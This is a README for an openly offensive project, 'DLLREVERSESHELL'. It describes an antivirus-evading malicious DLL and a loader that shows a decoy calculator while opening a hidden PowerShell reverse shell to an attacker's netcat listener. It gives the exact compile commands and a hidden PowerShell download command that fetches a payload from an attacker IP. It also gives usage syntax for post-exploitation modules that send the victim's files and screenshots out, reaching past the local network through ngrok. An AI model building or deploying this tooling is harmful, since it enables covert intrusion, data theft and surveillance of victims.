/DLLREVERSESHELL

A CUSTOM CODED FUD DLL, CODED IN C , WHEN LOADED , VIA A DECOY WEB-DELIVERY MODULE( FIRING A DECOY PROGRAM), WILL GIVE A REVERSE SHELL (POWERSHELL) FROM THE VICTIM MACHINE TO THE ATTACKER CONSOLE , OVER LAN AND WAN.

Primary LanguageC

DLLREVERSESHELL

A CUSTOM CODED FUD DLL, CODED IN C , WHEN LOADED , VIA A DECOY WEB-DELIVERY MODULE( FIRING A DECOY PROGRAM), WILL GIVE A REVERSE SHELL (POWERSHELL) FROM THE VICTIM MACHINE TO THE ATTACKER CONSOLE , OVER LAN AND WAN.

The project comprises of:

. A custom C header file, mingwdll.h

. The DLL C code mingw_dll.c

. The Loader file loader.c , that will invoke a web delivery of the DLL ,to the target machine, load the DLL in the runtime, producing the decoy program for the victim on the foreground, and spawning a connect back reverse shell (powershell) to the attacker, in the back ground

Phase 1 :

Place the mingwdll.h and mingw_dll.c in the same folder and compile using :

i686-w64-mingw32-gcc -Wall -shared mingw_dll.c -o calc_helper.dll -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

This will create the FUD DLL calc_helper.dll

File Description: root@nautilus:~/Desktop/c_code/dll_rsh# file calc_helper.dll calc_helper.dll: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows

Phase 2 :

Compile the loader.c using i686-w64-mingw32-gcc loader.c -o improved_calc.exe This will create the PE32 executable improved_calc.exe.

File Description: improved_calc.exe: PE32 executable (console) Intel 80386, for MS Windows

When the file improved_calc.exe , it might initially throw a Dll load error, thus I have ensured that a second call to regsvr32 is made post a _sleep() function, to ensure the DLL load on runtime.

Post the DLL is loaded , it will fire the decoy , calc.exe and spawn a reverse shell, (netcat listener on port 8080 as defined in the header file { nc -lvp 8080 } )

Cheers

#Captain_Nemo

DLLREVERSESHELL

https://youtu.be/HR0C_2_UAT8

POST EXPLOITATION MODULE

I have added a post exploitation module for file transfer , from the Victim machine to the Attacker machine.

Compile the C program , ft_clie.c using

i686-w64-mingw32-gcc ft_clie.c -o client_ft.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

This is webdelivered to the victim , through the newly incorporated system() function call system("start powershell -windowstyle Hidden Invoke-WebRequest -Uri 'http://192.168.225.196/client_ft.exe' -OutFile 'client_ft.exe'"); , in loader.c

syntax to run client_ft.exe :

.\client_ft.exe ss.txt 192.168.225.196 4444

or

.\client_ft.exe filename attackerip attackerport

from the reverse shell

In the mean while , compile the serverfiletransfer.c using gcc serverfiletransfer.c -o serv

Syntax: ./serv localattackerip chosenport or ./serv 192.168.225.196 4444

Once the reverse shell is obtained, ready the server using ./serv on a Linux terminal and on the Reverseshell , execute .\client_ft.exe , to transfer files from the victim to the atacker machine. This exploit can be leveraged to WAN using ngrok.

https://youtu.be/KJOwew96pqw

POST EXPLOITATION MODULE

The Screenshot module , (screenshot.cpp) , will take screenshots of the remote machine and the .bmp files can be transferred over lan / wan to the attacker machine.

Compilation Instruction: i686-w64-mingw32-g++ screenshot.cpp -o ss.exe -static-libstdc++ -static-libgcc -lgdi32